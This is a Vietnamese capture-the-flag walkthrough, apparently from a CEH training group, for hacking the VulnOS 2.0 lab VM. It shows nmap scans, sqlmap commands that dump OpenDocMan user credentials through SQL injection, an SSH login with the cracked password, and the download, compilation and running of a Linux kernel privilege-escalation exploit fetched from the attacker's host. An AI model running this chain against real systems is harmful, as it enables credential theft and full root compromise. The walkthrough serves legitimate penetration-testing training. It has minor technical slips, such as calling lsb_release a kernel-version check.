Hack máy ảo VulnOS 2.0 (Thử thách CTF dành cho ôn luyện tập CEH v12, PENTEST+, OSCP , CPENT,LPT,eJPT)

“Nhiệm vụ của bạn là kiểm tra một trang web của công ty mục tiêu, lấy thư mục gốc của hệ thống và đọc cờ cuối cùng”

Đây là một con máy ảo khá phổ biến cho việc luyện tập các bài thi thực hành, các bạn hãy tải về và dùng chương trình ảo hóa tương ứng để chạy lab.

Demo by HackerSploit https://www.youtube.com/watch?v=i-dQwejj518

Phương pháp Pentest :

• Quét mạng (netdetect, Nmap)
• Enumeration (đánh giá mã nguồn)
• Sử dụng Exploit 32075 (searchsploit)
• SQL injection (sqlmap)
• Sử dụng thông tin xác thực đã tìm để đăng nhập SSH
• Nâng cấp đặc quyền qua nhân linux (exploit 37292)
• Nhận quyền truy cập Root và lấy cờ.

Đầu tiên là netdiscover , tiện ích này được xem như tên của một thao tác mà tôi hay nói trong các bài thực hành và hầu hết ai cũng hiểu dùng để làm gì. Tuy nhiên, trong hầu hết các bài thi thực hành chính thức thì không dùng được, các bạn cần tiến hành netdiscover tinh tế hơn với các tùy chọn thích hợp của nmap, có khi chỉ là -sn nhưng nhiều lúc phải tắt bớt ping đi may ra mới mò được live host, mà không mò ra thì hack hiếc gì nữa 😦

netdiscover

Tại đây, ta phát hiện ra IP mục tiêu: 192.168.1.102, và bây giờ các bạn nên chạy nmap để xác định dịch vụ nào đang chạy.

nmap -p- -A 192.168.1.102

Ta thấy các dịch vụ đang chạy là SSH trên cổng 22 , HTTP trên cổng 80 và IRC trên 6667 . Vì cổng 80 đang mở, điều đó có nghĩa là chúng tôi có thể mở nó trong trình duyệt.

Ta không tìm thấy bất kỳ thứ gì trên một trang web, nên hãy xem mã nguồn của nó và ở đây thấy một liên kết /jabc ; hãy mở xem sao.

Khi khám phá thư mục /jabc trong trình duyệt, sẽ hiển thị trang sau.

Trong trang web này, có nhiều tab khác nhau , hãy khám phá từng tab bao gồm cả xem nguồn trang của chúng và tôi không tìm thấy gì ngoại trừ tab cuối cùng là Document.

Khi bạn nhìn vào mã nguồn của trang, sẽ có một dòng ghi “ /jabd0cs/ trên máy chủ. Chỉ cần đăng nhập với guest/guest.

Vì vậy, chúng ta mở thư mục và đăng nhập lần lượt với tên guest và mật khẩu guest . Và có một tùy chọn uplaod nhưng có một hạn chế là bạn chỉ có thể tải lên tệp .doc nên nó khá vô dụng (hoặc thử với burp hay zap để bypass), nhưng doc cũng k làm gì được trừ khi chúng ta up được shell.

Quan sát trang đăng nhập, ta thấy có cms opendocman v1.2.7 . Tìm với google ta thấy phiên bản opendocman này dễ bị tấn công hay có lỗi bảo mật.

Hãy tìm kiếm các khai thác để tấn công hay pentest opendocman như sau

searchsploit OpenDocMan 1.2.7

Từ kết quả ta tìm thấy exploit 32075.txt đang hiển thị “lỗ hổng bảo mật tồn tại do không đủ xác thực tham số HTTP GET “add_value” trong tập lệnh “/ajax_udf.php”. Kẻ tấn công từ xa không được xác thực có thể thực thi các lệnh SQL tùy ý trong cơ sở dữ liệu của ứng dụng.”

Bây giờ chúng ta sẽ sử dụng sqlmap để tìm ra cơ sở dữ liệu tên người dùng và mật khẩu :

sqlmap -u 'http://192.168.1.102/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --risk=3 --level=5 --dbs --threads=4 --batch

Và ta thấy tên cơ sở dữ liệu là “ jabcd0cs ”

sqlmap -u 'http://192.168.1.102/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs --risk=3 --level=5 --threads=4 --dump-all --batch

Lệnh sqlmap sẽ hiển thị cho chúng ta tất cả tên người dùng và mật khẩu như hình bên dưới.

Như bạn có thể thấy rằng mật khẩu là một giá trị băm MD5. Chúng ta có thể bẻ khóa trực tuyến mà không cần công cụ của bên thứ ba do nó cache hay đơn giãn, còn không phải dùng các công cụ mạnh như hashcat, john .

Mật khẩu hóa ra là webmin1980 với tên người dùng webmin. Vì chúng tôi có tên người dùng và mật khẩu, chúng tôi có thể đăng nhập thông qua cổng SSH. Để đăng nhập thông qua SSH, hãy mở Terminal mới trong kali và gõ:

ssh webmin@192.168.1.102

Và sau đó cung cấp mật khẩu khi được hỏi và bạn sẽ có một phiên. Hãy kiểm tra phiên bản kernel để xem nó có dễ bị tấn công hay không.

lsb_release -a

Phiên bản là 14.04 có thể bị khai thác và đặc biệt lưu ý các bài leo thang Ubuntu cho các phiên bản 18 và 20 mà tôi không như rõ phiên bản như có thể là dritycow hay dirypipe gì đó, nhìn chung là cứ dirty mà phang sẽ nhiều khả năng leo thang

searchsploit Ubuntu 14.04

Kết quảcho thấy rất nhiều khai thác và từ những khai thác đó, chúng tôi đã chọn 37292.c cho ‘overlayfs’ leo thang đặc quyền cục bộ .

Khởi động máy chủ HTTP python để chuyển nó vào máy của nạn nhân.

Nhập lệnh sau để tải xuống:

cd /tmp
wget https://192.168.1.108/37292.c

Khi khai thác được tải xuống, bây giờ như mọi khi chúng ta cần biên dịch nó và sau đó chạy nó. Và đối với điều đó, tập hợp các lệnh là:

gcc 37292.c -o shell
./shell

Và voila, bạn đã root nhưng thử thách của chúng tôi chưa hoàn thành ở đây. Chúng ta vẫn phải tìm lá cờ. Khi bạn đã root, hãy vào thư mục /root:

id
cd /root

Hãy kiểm tra xem nó đang giữ những tập tin và thư mục nào.

ls

Và ở đây bạn sẽ có một flag.txt. Đọc nó!

cat flag.txt

Các học viên lớp CEH v12 Hãy chạy pentest lab trên máy ảo của các bạn , thực hành và chụp hình kết quả gởi về BQT. CEH VIETNAM !